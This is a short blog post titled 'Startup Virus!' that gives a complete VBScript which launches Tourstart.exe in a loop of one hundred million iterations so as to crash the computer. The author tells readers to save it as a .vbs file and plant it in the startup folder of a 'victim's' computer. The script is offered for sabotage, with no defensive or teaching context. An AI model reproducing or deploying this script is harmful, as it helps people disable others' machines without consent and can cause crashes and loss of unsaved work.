Startup Virus !

Sudhanshu 2:32 AM | ,


Hi Friends,
Just copy this to notepad and save it as anyname.vbs and one new file will be created, by opening that file, it will only crash your computer but u can put it in the startup folder of the victims computer:

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next




0 comments:

Post a Comment